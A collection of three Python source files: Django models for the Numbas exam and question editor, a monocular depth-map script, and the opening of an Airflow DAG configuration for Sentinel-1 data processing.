queue += f.folders.all()
return folders, items
@reversion.register
class EditorItem(models.Model, NumbasObject, ControlledObject):
"""
Base model for exams and questions - each exam or question has a reference to an instance of this
"""
objects = EditorItemManager()
name = models.CharField(max_length=200)
slug = models.SlugField(max_length=200, editable=False, unique=False)
timeline = GenericRelation('TimelineItem', related_query_name='editoritems', content_type_field='timeline_content_type', object_id_field='timeline_id')
comments = GenericRelation('Comment', content_type_field='object_content_type', object_id_field='object_id')
author = models.ForeignKey(User, related_name='own_items', on_delete=models.CASCADE)
public_access = models.CharField(default='view', editable=True, choices=PUBLIC_ACCESS_CHOICES, max_length=6)
access_rights = models.ManyToManyField(User, through='Access', blank=True, editable=False, related_name='accessed_items')
licence = models.ForeignKey(Licence, null=True, blank=True, on_delete=models.SET_NULL)
project = models.ForeignKey(Project, null=True, related_name='items', on_delete=models.CASCADE)
folder = models.ForeignKey(Folder, null=True, related_name='items', on_delete=models.SET_NULL)
content = models.TextField(blank=True, validators=[validate_content])
metadata = JSONField(blank=True)
created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
copy_of = models.ForeignKey('self', null=True, related_name='copies', on_delete=models.SET_NULL)
tags = TaggableManager(through=TaggedItem)
current_stamp = models.ForeignKey('NewStampOfApproval', blank=True, null=True, on_delete=models.SET_NULL)
share_uuid_view = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)
share_uuid_edit = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)
published = models.BooleanField(default=False)
published_date = models.DateTimeField(null=True)
ability_level_start = AbilityLevelField(null=True)
ability_level_end = AbilityLevelField(null=True)
ability_levels = models.ManyToManyField(AbilityLevel)
subjects = models.ManyToManyField(Subject)
topics = models.ManyToManyField(Topic)
taxonomy_nodes = models.ManyToManyField(TaxonomyNode, related_name='editoritems')
unwatching_users = models.ManyToManyField(User, related_name='unwatched_items')
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
def __unicode__(self):
return self.name
@property
def watching_users(self):
q = (User.objects.filter(pk=self.author.pk) | User.objects.filter(item_accesses__item=self)).distinct() | self.project.watching_users
return q.exclude(pk__in=self.unwatching_users.all())
@property
def owner(self):
return self.author
def get_current_stamp(self):
if self.current_stamp is not None:
return self.current_stamp
else:
return NewStampOfApproval(object=self,status='draft')
def has_access(self, user, levels):
if user.is_anonymous:
return False
return self.project.has_access(user, levels) or Access.objects.filter(item=self, user=user, access__in=levels).exists()
def can_be_viewed_by(self, user):
if self.item_type=='exam' and getattr(settings,'EXAM_ACCESS_REQUIRES_QUESTION_ACCESS',False):
for q in self.exam.questions.all():
if not q.editoritem.can_be_viewed_by(user):
return False
return super().can_be_viewed_by(user)
def publish(self):
self.published = True
self.published_date = timezone.now()
def unpublish(self):
self.published = False
def set_licence(self, licence):
NumbasObject.get_parsed_content(self)
metadata = self.parsed_content.data.setdefault(u'metadata', {})
metadata['licence'] = licence.name if licence is not None else None
self.licence = licence
self.content = str(self.parsed_content)
def copy(self, author=None):
e2 = deepcopy(self)
e2.id = None
e2.share_uuid_view = uuid.uuid4()
e2.share_uuid_edit = uuid.uuid4()
e2.current_stamp = None
e2.public_access = 'view'
e2.published = False
e2.published_date = None
e2.copy_of = self
e2.folder = None
if author is not None:
e2.author = author
return e2
def get_absolute_url(self):
return self.rel_obj.get_absolute_url()
@property
def item_type(self):
if hasattr(self, 'exam'):
return 'exam'
elif hasattr(self, 'question'):
return 'question'
@property
def rel_obj(self):
""" the exam/question object corresponding to this item (to make contructing the URLs easier, mainly) """
if hasattr(self, 'exam'):
return self.exam
elif hasattr(self, 'question'):
return self.question
def as_numbasobject(self,request):
obj = self.exam if self.item_type=='exam' else self.question
numbasobj = obj.as_numbasobject(request)
return numbasobj
@property
def icon(self):
return self.rel_obj.icon
@property
def theme_path(self):
return self.rel_obj.theme_path
def edit_dict(self):
"""
Dictionary of information passed to edit view
"""
self.get_parsed_content()
return {
'id': self.rel_obj.id,
'editoritem_id': self.id,
'project_id': self.project.id,
'author': self.author_id,
'metadata': self.metadata,
'published': self.published,
'JSONContent': self.parsed_content.data,
'tags': [t.name for t in self.tags.all()],
'taxonomy_nodes': [n.pk for n in self.taxonomy_nodes.all()],
'ability_levels': [a.pk for a in self.ability_levels.all()],
}
@property
def filename(self):
return '{}-{}-{}'.format(self.item_type, self.pk, self.slug)
@property
def network(self):
ei = self
while ei.copy_of:
ei = ei.copy_of
return sorted(ei.descendants(), key=lambda x: x.created)
def descendants(self):
return [self]+sum([ei2.descendants() for ei2 in self.copies.all()], [])
def summary(self, user=None):
current_stamp = self.get_current_stamp()
obj = {
'editoritem_id': self.id,
'name': self.name,
'published': self.published,
'metadata': self.metadata,
'created': str(self.created),
'last_modified': str(self.last_modified),
'author': self.author.get_full_name(),
'current_stamp': current_stamp.status,
'current_stamp_display': current_stamp.get_status_display()
}
if self.item_type == 'exam':
obj['id'] = self.exam.id
elif self.item_type == 'question':
obj['id'] = self.question.id
if user:
obj['canEdit'] = self.can_be_edited_by(user)
return obj
def merge(self, other):
oname = self.name
self.content = other.content
self.metadata = other.metadata
self.tags.set(*other.tags.all())
self.ability_levels.clear()
self.ability_levels.add(*other.ability_levels.all())
self.set_name(oname)
self.rel_obj.merge(other.rel_obj)
self.save()
@receiver(signals.post_save, sender=EditorItem)
def author_contributes_to_editoritem(instance, created, **kwargs):
if created:
Contributor.objects.get_or_create(item=instance,user=instance.author)
@receiver(signals.pre_save, sender=EditorItem)
def set_editoritem_name(instance, **kwargs):
NumbasObject.get_parsed_content(instance)
instance.slug = slugify(instance.name)
if 'metadata' in instance.parsed_content.data:
licence_name = instance.parsed_content.data['metadata'].get('licence', None)
else:
licence_name = None
instance.licence = Licence.objects.filter(name=licence_name).first()
@receiver(signals.pre_save, sender=EditorItem)
def set_ability_level_limits(instance, **kwargs):
if instance.pk is None:
return
ends = instance.ability_levels.aggregate(Min('start'), Max('end'))
instance.ability_level_start = ends.get('start__min', None)
instance.ability_level_end = ends.get('end__max', None)
class PullRequestManager(models.Manager):
def open(self):
return self.filter(open=True)
class PullRequest(models.Model, ControlledObject, TimelineMixin):
objects = PullRequestManager()
# user who created this request
owner = models.ForeignKey(User, related_name='pullrequests_created', on_delete=models.CASCADE)
# user who accepted or rejected this request
closed_by = models.ForeignKey(User, related_name='pullrequests_closed', null=True, blank=True, on_delete=models.SET_NULL)
source = models.ForeignKey(EditorItem, related_name='outgoing_pull_requests', on_delete=models.CASCADE)
destination = models.ForeignKey(EditorItem, related_name='incoming_pull_requests', on_delete=models.CASCADE)
open = models.BooleanField(default=True)
accepted = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
comment = models.TextField(blank=True)
timelineitems = GenericRelation('TimelineItem', related_query_name='pull_requests', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/pull_request.html'
@property
def object(self):
return self.destination
def timeline_user(self):
if self.open:
return self.owner
else:
return self.closed_by
def has_access(self, user, accept_levels):
return self.destination.has_access(user, accept_levels) or user == self.owner
def can_be_merged_by(self, user):
return self.destination.can_be_edited_by(user)
def can_be_deleted_by(self, user):
return user == self.owner or self.destination.can_be_edited_by(user)
def can_be_viewed_by(self, user):
return self.source.can_be_viewed_by(user) and self.destination.can_be_viewed_by(user)
def clean(self):
if self.source == self.destination:
raise ValidationError({'source': "Source and destination are the same."})
def validate_unique(self, exclude=None):
if self.open and PullRequest.objects.filter(source=self.source, destination=self.destination, open=True).exists():
raise ValidationError("There's already an open pull request between these items.")
def accept(self, user):
self.accepted = True
self.destination.merge(self.source)
self.close(user)
self.save()
def reject(self, user):
self.accepted = False
self.close(user)
self.save()
def close(self, user):
self.open = False
self.closed_by = user
class Timeline(object):
def __init__(self, items, viewing_user):
self.viewing_user = viewing_user
items = items.prefetch_related('object')
nonsticky_broadcasts = SiteBroadcast.objects.visible_now().exclude(sticky=True)
view_filter = Q(editoritems__published=True) | Q(object_content_type=ContentType.objects.get_for_model(SiteBroadcast), object_id__in=nonsticky_broadcasts)
if not self.viewing_user.is_anonymous:
projects = self.viewing_user.own_projects.all() | Project.objects.filter(projectaccess__in=self.viewing_user.project_memberships.all()) | Project.objects.filter(watching_non_members=self.viewing_user)
items_for_user = (
Q(editoritems__accesses__in=self.viewing_user.item_accesses.all()) |
Q(editoritems__project__in=projects) |
Q(projects__in=projects) |
Q(extension_accesses__user=viewing_user) |
Q(theme_accesses__user=viewing_user)
)
view_filter = view_filter | items_for_user
filtered_items = items.filter(view_filter)
if not self.viewing_user.is_anonymous:
filtered_items = filtered_items.exclude(hidden_by=self.viewing_user)
self.filtered_items = filtered_items
def __getitem__(self, index):
return self.filtered_items.__getitem__(index)
class TimelineItemManager(models.Manager):
def visible_to(self, user):
objects = self.exclude(hidden_by=user)
return objects
class TimelineItem(models.Model):
objects = TimelineItemManager()
# Object whose timeline this item belongs to
timeline_content_type = models.ForeignKey(ContentType, related_name='timelineitem_timeline', null=True, on_delete=models.CASCADE)
timeline_id = models.PositiveIntegerField(null=True)
timeline = GenericForeignKey('timeline_content_type', 'timeline_id')
# Reference to an object representing this item (e.g. a Comment)
object_content_type = models.ForeignKey(ContentType, related_name='timelineitem_object', on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
object = GenericForeignKey('object_content_type', 'object_id')
user = models.ForeignKey(User, related_name='timelineitems', null=True, on_delete=models.CASCADE)
hidden_by = models.ManyToManyField(User, related_name='hidden_timelineitems', blank=True)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{}: {}'.format(self.date, str(self.object))
def can_be_deleted_by(self, user):
try:
return self.object.can_be_deleted_by(user)
except AttributeError:
return False
def can_be_viewed_by(self, user):
return self.user == user or self.object.can_be_viewed_by(user)
class Meta:
unique_together = (('object_id', 'object_content_type'),)
ordering = ('-date',)
@receiver(signals.post_delete, sender=TimelineItem)
def delete_timelineitem_object(instance, *args, **kwargs):
if instance.object is not None:
instance.object.delete()
class SiteBroadcastManager(models.Manager):
def visible_now(self):
return self.filter(Q(show_until__gte=timezone.now()) | Q(show_until=None))
class SiteBroadcast(models.Model, TimelineMixin):
objects = SiteBroadcastManager()
author = models.ForeignKey(User, related_name='site_broadcasts', on_delete=models.CASCADE)
title = models.CharField(max_length=200)
text = models.TextField()
sticky = models.BooleanField(default=False)
show_until = models.DateTimeField(null=True, blank=True)
timelineitems = GenericRelation(TimelineItem, related_query_name='site_broadcasts', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/site_broadcast.html'
def can_be_deleted_by(self, user):
return False
def can_be_viewed_by(self, user):
return True
def timeline_object(self):
return None
def __str__(self):
return self.text[:50]
class Tip(models.Model):
title = models.CharField(max_length=500)
text = models.TextField()
link = models.URLField(blank=True, null=True, verbose_name='Link to more information')
link_text = models.CharField(blank=True, null=True, max_length=200)
editoritem = models.ForeignKey(EditorItem, related_name='used_in_tips', blank=True, null=True, on_delete=models.SET_NULL, verbose_name='A question or exam demonstrating the tip')
def __str__(self):
return self.title
def __repr__(self):
return 'Tip "{}"'.format(self.title)
class NewStampOfApproval(models.Model, TimelineMixin):
object = models.ForeignKey(EditorItem, related_name='stamps', on_delete=models.CASCADE)
timelineitems = GenericRelation(TimelineItem, related_query_name='stamps', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/stamp.html'
user = models.ForeignKey(User, related_name='newstamps', on_delete=models.CASCADE)
status = models.CharField(choices=STAMP_STATUS_CHOICES, max_length=20)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{} said "{}"'.format(self.user.username, self.get_status_display())
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
class Meta:
ordering = ('-date',)
class Comment(models.Model, TimelineMixin):
object_content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
object = GenericForeignKey('object_content_type', 'object_id')
timelineitems = GenericRelation(TimelineItem, related_query_name='comments', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/comment.html'
user = models.ForeignKey(User, related_name='comments', on_delete=models.CASCADE)
text = models.TextField()
def __str__(self):
return 'Comment by {} on {}: "{}"'.format(self.user.get_full_name(), str(self.object), self.text[:47]+'...' if len(self.text) > 50 else self.text)
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
class RestorePoint(models.Model, TimelineMixin):
object = models.ForeignKey(EditorItem, related_name='restore_points', on_delete=models.CASCADE)
timelineitems = GenericRelation(TimelineItem, related_query_name='restore_points', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/restore_point.html'
user = models.ForeignKey(User, related_name='restore_points', on_delete=models.CASCADE)
description = models.TextField()
revision = models.ForeignKey(reversion.models.Revision, on_delete=models.CASCADE)
def __str__(self):
return 'Restore point set by {} on {}: "{}"'.format(self.user.get_full_name(), str(self.object), self.description[:47]+'...' if len(self.description) > 50 else self.description)
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
ITEM_CHANGED_VERBS = [('created', 'created')]
class ItemChangedTimelineItem(models.Model, TimelineMixin):
object = models.ForeignKey(EditorItem, on_delete=models.CASCADE)
verb = models.CharField(choices=ITEM_CHANGED_VERBS, editable=False, max_length=10)
user = models.ForeignKey(User, on_delete=models.CASCADE)
timelineitems = GenericRelation(TimelineItem, related_query_name='item_changes', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/change.html'
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return False
def icon(self):
return {
'created': 'plus',
'deleted': 'remove',
'published': 'globe',
}[self.verb]
def __str__(self):
return '{} {} {}'.format(self.user.get_full_name(), self.verb, str(self.object))
@receiver(signals.post_save)
def create_timelineitem(sender, instance, created, **kwargs):
if not issubclass(sender, TimelineMixin):
return
if created:
try:
user = User.objects.get(pk=instance.user.pk)
except AttributeError:
user = None
TimelineItem.objects.create(object=instance, timeline=instance.timeline_object(), user=user)
@reversion.register
class NewQuestion(models.Model):
editoritem = models.OneToOneField(EditorItem, on_delete=models.CASCADE, related_name='question')
resources = models.ManyToManyField(Resource, blank=True)
extensions = models.ManyToManyField(Extension, blank=True)
custom_part_types = models.ManyToManyField(CustomPartType, blank=True, related_name='questions')
theme_path = os.path.join(settings.GLOBAL_SETTINGS['NUMBAS_PATH'], 'themes', 'question')
icon = 'file'
class Meta:
verbose_name = 'question'
ordering = ['editoritem__name']
permissions = (
('highlight', 'Can pick questions to feature on the front page.'),
)
def __str__(self):
return self.editoritem.name
def __unicode__(self):
return self.editoritem.name
def get_absolute_url(self):
return reverse('question_edit', args=(self.pk, self.editoritem.slug))
@property
def resource_paths(self):
return [(r.file.name, r.file.path) for r in self.resources.all()]
def as_numbasobject(self,request):
self.editoritem.get_parsed_content()
contributor_data = [c.as_json(request) for c in self.editoritem.contributors.all()]
question_data = self.editoritem.parsed_content.data
question_data['contributors'] = contributor_data
data = OrderedDict([
('name', self.editoritem.name),
('extensions', [e.location for e in self.extensions.all()]),
('custom_part_types', [p.as_json() for p in self.custom_part_types.all()]),
('resources', self.resource_paths),
('navigation', {'allowregen': True, 'showfrontpage': False, 'preventleave': False}),
('question_groups', [{'pickingStrategy':'all-ordered', 'questions':[question_data]}]),
])
data['contributors'] = contributor_data
obj = numbasobject.NumbasObject(data=data, version=self.editoritem.parsed_content.version)
return obj
def edit_dict(self):
d = self.editoritem.edit_dict()
d['extensions'] = [e.location for e in self.extensions.all()]
d['resources'] = [res.as_json() for res in self.resources.all()]
return d
def summary(self, user=None):
obj = self.editoritem.summary(user)
obj['url'] = reverse('question_edit', args=(self.pk, self.editoritem.slug,))
obj['deleteURL'] = reverse('question_delete', args=(self.pk, self.editoritem.slug))
return obj
@property
def exams_using_this(self):
return self.exams.distinct()
def copy(self, author=None):
q2 = deepcopy(self)
q2.id = None
ei2 = self.editoritem.copy(author)
ei2.save()
q2.editoritem = ei2
q2.save()
q2.resources.set(self.resources.all())
q2.extensions.set(self.extensions.all())
q2.save()
return q2
def merge(self, other):
self.resources.clear()
self.resources.add(*other.resources.all())
self.extensions.clear()
self.extensions.add(*other.extensions.all())
self.save()
@receiver(signals.post_save, sender=NewQuestion)
def set_question_custom_part_types(instance, **kwargs):
q = instance
c = NumbasObject.get_parsed_content(q.editoritem)
parts = c.data.get('parts',[])
all_parts = parts[:]
for p in parts:
all_parts += [s for s in p.get('steps',[])] + [g for g in p.get('gaps',[])]
part_types = set(p['type'] for p in all_parts)
q.custom_part_types.clear()
custom_part_types = CustomPartType.objects.filter(short_name__in=part_types)
q.custom_part_types.add(*custom_part_types)
@reversion.register
class NewExam(models.Model):
editoritem = models.OneToOneField(EditorItem, on_delete=models.CASCADE, related_name='exam')
questions = models.ManyToManyField(NewQuestion, through='NewExamQuestion', blank=True, editable=False, related_name='exams')
theme = models.CharField(max_length=200, default='default', blank=True) # used if custom_theme is None
custom_theme = models.ForeignKey(Theme, null=True, blank=True, on_delete=models.SET_NULL, related_name='used_in_newexams')
locale = models.CharField(max_length=200, default='en-GB')
icon = 'book'
class Meta:
verbose_name = 'exam'
def __str__(self):
return self.editoritem.name
def __unicode__(self):
return self.editoritem.name
def get_absolute_url(self):
return reverse('exam_edit', args=(self.pk, self.editoritem.slug))
@property
def resources(self):
return Resource.objects.filter(newquestion__in=self.questions.all()).distinct()
@property
def resource_paths(self):
return [(r.file.name, r.file.path) for r in self.resources.all()]
@property
def theme_path(self):
if self.custom_theme:
return self.custom_theme.extracted_path
else:
return os.path.join(settings.GLOBAL_SETTINGS['NUMBAS_PATH'], 'themes', self.theme)
def as_numbasobject(self,request):
obj = numbasobject.NumbasObject(self.editoritem.content)
data = obj.data
question_groups = self.question_groups
data['contributors'] = [c.as_json(request) for c in self.editoritem.contributors.all()]
data['extensions'] = [e.location for e in self.extensions]
data['custom_part_types'] = [p.as_json() for p in self.custom_part_types]
data['name'] = self.editoritem.name
if 'question_groups' not in data:
data['question_groups'] = self.question_groups_dict()
for i, g in enumerate(data['question_groups']):
if i < len(question_groups):
questions = question_groups[i]
else:
questions = []
def question_object(q):
data = q.editoritem.as_numbasobject(request).data
del data['question_groups']
data.update(q.editoritem.parsed_content.data)
return data
g['questions'] = [question_object(q) for q in questions]
data['resources'] = self.resource_paths
return obj
def edit_dict(self):
"""
Dictionary of information passed to update view
"""
exam_dict = self.editoritem.edit_dict()
exam_dict['locale'] = self.locale
exam_dict['custom_theme'] = self.custom_theme_id
exam_dict['theme'] = self.theme
exam_dict['question_groups'] = self.question_groups_dict()
return exam_dict
def question_groups_dict(self):
groups = groupby(self.newexamquestion_set.order_by('group', 'qn_order'), key=lambda q: q.group)
return [{'group':group, 'questions':[q.question.summary() for q in qs]} for group, qs in groups]
@property
def question_groups(self):
groups = []
for eq in self.newexamquestion_set.all():
while len(groups) < eq.group+1:
groups.append([])
groups[eq.group].append(eq.question)
return groups
@property
def extensions(self):
return Extension.objects.filter(newquestion__in=self.questions.all()).distinct()
@property
def custom_part_types(self):
return CustomPartType.objects.filter(questions__in=self.questions.all()).distinct()
def set_question_groups(self, question_groups):
with transaction.atomic():
self.questions.clear()
for group_number, group in enumerate(question_groups):
for order, pk in enumerate(group):
exam_question = NewExamQuestion(exam=self, question=NewQuestion.objects.get(pk=pk), qn_order=order, group=group_number)
exam_question.save()
def copy(self, author=None):
e2 = deepcopy(self)
e2.id = None
ei2 = self.editoritem.copy(author)
ei2.save()
e2.editoritem = ei2
e2.save()
for eq in NewExamQuestion.objects.filter(exam=self):
NewExamQuestion.objects.create(exam=e2, question=eq.question, qn_order=eq.qn_order, group=eq.group)
e2.custom_theme = self.custom_theme
e2.save()
return e2
def merge(self, other):
with transaction.atomic():
for eq in other.newexamquestion_set.all():
exam_question = NewExamQuestion(exam=self, question=eq.question, qn_order=eq.qn_order, group=eq.group)
exam_question.save()
self.theme = other.theme
self.custom_theme = other.custom_theme
self.locale = other.locale
self.save()
class NewExamQuestion(models.Model):
"""
Through model for a question belonging to an exam.
Specifies position the question should appear in.
"""
class Meta:
ordering = ['qn_order']
exam = models.ForeignKey(NewExam, on_delete=models.CASCADE)
question = models.ForeignKey(NewQuestion, on_delete=models.CASCADE)
qn_order = models.PositiveIntegerField()
group = models.PositiveIntegerField(default=0)
@receiver(signals.post_save, sender=NewQuestion)
@receiver(signals.post_save, sender=NewExam)
def item_created_timeline_event(instance, created, **kwargs):
if created:
ItemChangedTimelineItem.objects.create(user=instance.editoritem.author, object=instance.editoritem, verb='created')
@receiver(signals.post_save, sender=NewStampOfApproval)
@receiver(signals.post_delete, sender=NewStampOfApproval)
def set_current_stamp(instance, **kwargs):
instance.object.current_stamp = NewStampOfApproval.objects.filter(object=instance.object).order_by('-date').first()
instance.object.save()
@receiver(signals.post_save, sender=NewStampOfApproval)
def notify_stamp(instance, **kwargs):
notify_watching(instance.user, target=instance.object, verb='gave feedback on', action_object=instance)
@receiver(signals.post_save, sender=Comment)
def notify_comment(instance, **kwargs):
notify_watching(instance.user, target=instance.object, verb='commented on', action_object=instance)
@receiver(signals.post_delete, sender=EditorItem)
def delete_notifications_for_item(instance, **kwargs):
Notification.objects.filter(target_object_id=instance.pk, target_content_type=ContentType.objects.get_for_model(EditorItem)).delete()
|
py | 1a37bf556a214b3dcbf6dd6b374f75df9de59d37 | """Compute depth maps for images in the input folder.
"""
import os
import glob
import torch
# from monodepth_net import MonoDepthNet
# import utils
import matplotlib.pyplot as plt
import numpy as np
import cv2
import imageio
from PIL import Image
def run_depth(img_names, input_path, output_path, model_path, Net, utils, target_w=None):
"""Run MonoDepthNN to compute depth maps.
Args:
input_path (str): path to input folder
output_path (str): path to output folder
model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cpu")
print("device: %s" % device)
# load network
model = Net(model_path)
model.to(device)
model.eval()
# get input
# img_names = glob.glob(os.path.join(input_path, "*"))
num_images = len(img_names)
# create output folder
os.makedirs(output_path, exist_ok=True)
print("start processing")
for ind, img_name in enumerate(img_names):
print(" processing {} ({}/{})".format(img_name, ind + 1, num_images))
# input
img = utils.read_image(img_name)
w = img.shape[1]
scale = 640. / max(img.shape[0], img.shape[1])
target_height, target_width = int(round(img.shape[0] * scale)), int(round(img.shape[1] * scale))
img_input = utils.resize_image(img)
print(img_input.shape)
img_input = img_input.to(device)
# compute
with torch.no_grad():
out = model.forward(img_input)
depth = utils.resize_depth(out, target_width, target_height)
img = cv2.resize((img * 255).astype(np.uint8), (target_width, target_height), interpolation=cv2.INTER_AREA)
filename = os.path.join(
output_path, os.path.splitext(os.path.basename(img_name))[0]
)
np.save(filename + '.npy', depth)
# utils.write_depth(filename, depth, img, bits=2)
print("finished")
def run_depthv(img_npy, model_path,w,h, Net, utils, target_w=None):
"""Run MonoDepthNN to compute depth maps.
Args:
input_path (str): path to input folder
output_path (str): path to output folder
model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cuda")
print("device: %s" % device)
# load network
model = Net(model_path)
model.to(device)
model.eval()
# get input
# img_names = glob.glob(os.path.join(input_path, "*"))
#num_images = len(img_names)
# create output folder
# os.makedirs(output_path, exist_ok=True)
print("start processing")
# input
if img_npy.ndim == 2:
img = cv2.cvtColor(img_npy, cv2.COLOR_GRAY2BGR)
img = cv2.cvtColor(img_npy, cv2.COLOR_BGR2RGB) / 255.0
w = img.shape[1]
scale = 640. / max(img.shape[0], img.shape[1])
target_height, target_width = int(round(img.shape[0] * scale)), int(round(img.shape[1] * scale))
img_input = utils.resize_image(img)
print(img_input.shape)
img_input = img_input.to(device)
# compute
with torch.no_grad():
out = model.forward(img_input)
depth = 50 + utils.resize_depth(out, w, h)*130
img = cv2.resize((img * 255).astype(np.uint8), (w, h), interpolation=cv2.INTER_AREA)
depth = np.clip(depth,0,254)
# img = cv2.resize((img * 255).astype(np.uint8), (target_width, target_height), interpolation=cv2.INTER_AREA)
# write_pfm(path + ".pfm", depth.astype(np.float32))
disp_to_img =np.array(Image.fromarray(depth).resize([w, h]))
# plt.imsave("test_disp.jpg", disp_to_img, cmap='gray')
# plt.imsave("test2_disp.jpg", img, cmap='gray')
disp_to_img = cv2.cvtColor(disp_to_img, cv2.COLOR_GRAY2RGB )
sbsframe= np.hstack((img_npy,disp_to_img))
return sbsframe
# utils.write_depth(filename, depth, img, bits=2)
print("finished")
def run_depthf(in_path,out_path, model_path,w,h, Net, utils, target_w=None):
"""Run MonoDepthNN to compute depth maps.
Args:
input_path (str): path to input folder
output_path (str): path to output folder
model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cpu")
print("device: %s" % device)
# load network
model = Net(model_path)
model.to(device)
model.eval()
# get input
# img_names = glob.glob(os.path.join(input_path, "*"))
#num_images = len(img_names)
# create output folder
# os.makedirs(output_path, exist_ok=True)
print("start processing")
# input
img = utils.read_image(in_path)
w = img.shape[1]
scale = 640. / max(img.shape[0], img.shape[1])
target_height, target_width = int(round(img.shape[0] * scale)), int(round(img.shape[1] * scale))
img_input = utils.resize_image(img)
print(img_input.shape)
img_input = img_input.to(device)
# compute
with torch.no_grad():
out = model.forward(img_input)
depth = 50 + utils.resize_depth(out, w, h)*130
img = cv2.resize((img * 255).astype(np.uint8), (w, h), interpolation=cv2.INTER_AREA)
depth = np.clip(depth,0,254)
# img = cv2.resize((img * 255).astype(np.uint8), (w, h), interpolation=cv2.INTER_AREA)
# write_pfm(path + ".pfm", depth.astype(np.float32))
disp_to_img =np.array(Image.fromarray(depth).resize([w, h]))
# plt.imsave("test_disp.jpg", disp_to_img, cmap='gray')
# plt.imsave("test2_disp.jpg", img, cmap='gray')
disp_to_img = cv2.cvtColor(disp_to_img, cv2.COLOR_GRAY2RGB )
sbsframe= np.hstack((img,disp_to_img))
sbsframe= sbsframe.astype(np.uint8)
print(out_path)
k=Image.fromarray(sbsframe)
k.save(out_path)
#utils.write_depth(out_path, depth, img, bits=2)
print("finished")
# if __name__ == "__main__":
# # set paths
# INPUT_PATH = "image"
# OUTPUT_PATH = "output"
# MODEL_PATH = "model.pt"
# # set torch options
# torch.backends.cudnn.enabled = True
# torch.backends.cudnn.benchmark = True
# # compute depth maps
# run_depth(INPUT_PATH, OUTPUT_PATH, MODEL_PATH, Net, target_w=640)
|
py | 1a37bfae9bd13611e15a98b21e3b6c87ccdce595 | """
/*********************************************************************************/
* The MIT License (MIT) *
* *
* Copyright (c) 2014 EOX IT Services GmbH *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in *
* all copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
* *
*********************************************************************************/
"""
import os
import logging
import pprint
from datetime import datetime, timedelta
from airflow import DAG
from airflow.models import XCOM_RETURN_KEY
from airflow.operators import PythonOperator
from airflow.operators import RSYNCOperator
from airflow.operators import DHUSSearchOperator
from airflow.operators import DHUSDownloadOperator
from airflow.operators import ZipInspector
from airflow.operators import S1MetadataOperator
from airflow.operators import GDALWarpOperator
from airflow.operators import GDALAddoOperator
from airflow.utils.trigger_rule import TriggerRule
from geoserver_plugin import publish_product
import config as CFG
import config.s1_grd_1sdv as S1GRD1SDV
log = logging.getLogger(__name__)
# Settings
default_args = {
##################################################
# General configuration
#
'start_date': datetime.now() - timedelta(hours=1),
'owner': 'airflow',
'depends_on_past': False,
'provide_context': True,
'email': ['[email protected]'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'max_threads': 1,
'max_active_runs': 1,
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
#
}
print("#######################")
print("Interval: ".format(S1GRD1SDV.dag_schedule_interval))
print("ID: {}".format(S1GRD1SDV.id))
print("DHUS: {} @ {}, Region: {}".format(CFG.dhus_username, CFG.dhus_url, S1GRD1SDV.dhus_search_bbox) )
print("GeoServer: {} @ {}".format(CFG.geoserver_username, CFG.geoserver_rest_url) )
print("RSYNC: {} @ {} using {}".format(CFG.rsync_username, CFG.rsync_hostname, CFG.rsync_ssh_key))
print("Date: {} / {}".format(S1GRD1SDV.dhus_search_startdate, S1GRD1SDV.dhus_search_enddate))
print("Search: max={}, order_by={}, keywords={}".format(S1GRD1SDV.dhus_filter_max, S1GRD1SDV.dhus_search_orderby,S1GRD1SDV.dhus_search_keywords))
print("Paths:\n collection_dir={}\n download_dir={}\n process_dir={}\n original_package_upload_dir={}\n repository_dir={}".format(S1GRD1SDV.collection_dir, S1GRD1SDV.download_dir, S1GRD1SDV.process_dir, S1GRD1SDV.original_package_upload_dir, S1GRD1SDV.repository_dir))
print("Collection:\n workspace={}\n layer={}".format(S1GRD1SDV.geoserver_workspace, S1GRD1SDV.geoserver_layer))
print("#######################")
TARGET_SRS = 'EPSG:4326'
TILE_SIZE = 512
OVERWRITE = True
RESAMPLING_METHOD = 'average'
MAX_OVERVIEW_LEVEL = 512
def prepare_band_paths(get_inputs_from, *args, **kwargs):
